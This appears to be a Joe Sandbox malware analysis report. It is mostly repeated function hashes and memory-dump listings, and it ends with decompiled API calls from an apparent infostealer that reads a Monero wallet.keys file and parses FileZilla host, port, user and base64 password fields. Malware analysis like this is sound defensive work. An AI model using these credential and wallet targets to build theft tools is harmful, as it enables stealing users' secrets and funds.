                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86b757136c2486d1cb5034b9b34d8809cc4c53773eeea3967dfa6813deefbf6f
                                  • Instruction ID: 29da9272481c8c97f3fad96da9be698a1279f9ece1c5c45bc8f1bd691a5ab7b9
                                  • Opcode Fuzzy Hash: 86b757136c2486d1cb5034b9b34d8809cc4c53773eeea3967dfa6813deefbf6f
                                  • Instruction Fuzzy Hash: D561D4F3A086009FE3056E2DDC957BABBD5EF94360F17463DDAC4C7780E93598058686
                                  Function 00ADE650 Relevance: .2, Instructions: 213COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e499c8676d2cf9ae4952b4fcc1f067d952f27dc4eded87272ac02b4f5e93825
                                  • Instruction ID: fb8b58d79bceb1b7c12f0f81f6ec02aa10273df973fb84e13fb99912a3cd2b98
                                  • Opcode Fuzzy Hash: 9e499c8676d2cf9ae4952b4fcc1f067d952f27dc4eded87272ac02b4f5e93825
                                  • Instruction Fuzzy Hash: FB6127B391C2109FD3046F29DC5476AFBE5EF98720F264A3DEAC4D3380EA7598148687
                                  Function 00C2D3B3 Relevance: .2, Instructions: 205COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c23549d80244f5138d9848a4cb4c42d13564edcea65283bfba558aea8526100
                                  • Instruction ID: 628365d62bd60ed0ecf0e7db2957cb610bceb93915bb1b039daae583861a796f
                                  • Opcode Fuzzy Hash: 6c23549d80244f5138d9848a4cb4c42d13564edcea65283bfba558aea8526100
                                  • Instruction Fuzzy Hash: 01517AF3E092045BF304593DEC5573A76C7DBD4720F2B863EEA8583B88EC3949060156
                                  Function 00C6C576 Relevance: .2, Instructions: 175COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5de92f501ba05acde040492de92ee80bb8bd72f0321db2e33f19a51146fd2482
                                  • Instruction ID: f0682c0a63ef6d989195a67a20093eee9783130bb092bd76de9a1fc49cada105
                                  • Opcode Fuzzy Hash: 5de92f501ba05acde040492de92ee80bb8bd72f0321db2e33f19a51146fd2482
                                  • Instruction Fuzzy Hash: EC5175B310C201EFC3216E2ADCC467ABBD5EBA4360F354929E6D3C7244E7319401AA9B
                                  Function 00CE3D3C Relevance: .2, Instructions: 164COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06381d85afaeb793fdb41213240e3e3c0474f435410f44456e2c7ef6a08dbfc8
                                  • Instruction ID: 73f92f9d9248b7f33b555b09d1cd800cce5e727da8c5bf24fd2b75e330b26e8b
                                  • Opcode Fuzzy Hash: 06381d85afaeb793fdb41213240e3e3c0474f435410f44456e2c7ef6a08dbfc8
                                  • Instruction Fuzzy Hash: 7851D3B251C6C1DFD314AF2BDC8963ABBF0EB54320F22492DE5C687644D2356A409B83
                                  Function 00BB2E97 Relevance: .2, Instructions: 154COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ed1ccfdb789af697d7d62a82980eddf0539cc796cee79defd118eca16aa4282d
                                  • Instruction ID: 16b961542aba6fc26fc595c19f8ef2758d26c8e2ed01d3f4c1f92cebfaaf6400
                                  • Opcode Fuzzy Hash: ed1ccfdb789af697d7d62a82980eddf0539cc796cee79defd118eca16aa4282d
                                  • Instruction Fuzzy Hash: DF41A5F3A1C6109FF719AE28EC8577AB7D5EB54314F06493DEF85D3780E63A5800868A
                                  Function 00B7930B Relevance: .1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9cf77c93746e6a16d09c5d01106025fc9117e1324b2283c973673e29b5b21547
                                  • Instruction ID: 931bfbc5cfe902f8428d4337f2d4a9355aa5bc5442a2efdd4a813d9896876c11
                                  • Opcode Fuzzy Hash: 9cf77c93746e6a16d09c5d01106025fc9117e1324b2283c973673e29b5b21547
                                  • Instruction Fuzzy Hash: CF417BB3E087144BE304BE2DAC85327F7DAEBD4720F1A823DED8493B45ED7658058292
                                  Function 00B13780 Relevance: .1, Instructions: 146COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 618e1cf92ac34a514baa00d3a6b12d7d260d06960c95e1b669c5ab710cc4ff5f
                                  • Instruction ID: 1012c6a5037bf4fadce971396906396efa81ec04f82eae0dedbfd739583f2572
                                  • Opcode Fuzzy Hash: 618e1cf92ac34a514baa00d3a6b12d7d260d06960c95e1b669c5ab710cc4ff5f
                                  • Instruction Fuzzy Hash: 864118F27082006FF308AD29EC9577BB3D7EBD4310F19863DE68183744ED79A9168656
                                  Function 00856799 Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction ID: e02f94f4cd62e8d247d6becdca8e8f73443dbfe6dff9fadc7c7cbc5e50928459
                                  • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction Fuzzy Hash: 3D516B62E09BD985C7058B7944502EEBFB26FE6200F1E829DC8985B382D2355689C3E5
                                  Function 00827588 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                  • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                  • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                  • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                  Function 007F9AA0 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 007F03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00800DBF,00800DBE,00800DBB,00800DBA), ref: 007F04C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F04C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 007F04E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F04F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 007F052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 007F0579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F0587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007F05C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F05D5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F0662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F0692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00800DB7), ref: 007F06AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 007F06C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 007F06D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 007F06E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F06F3
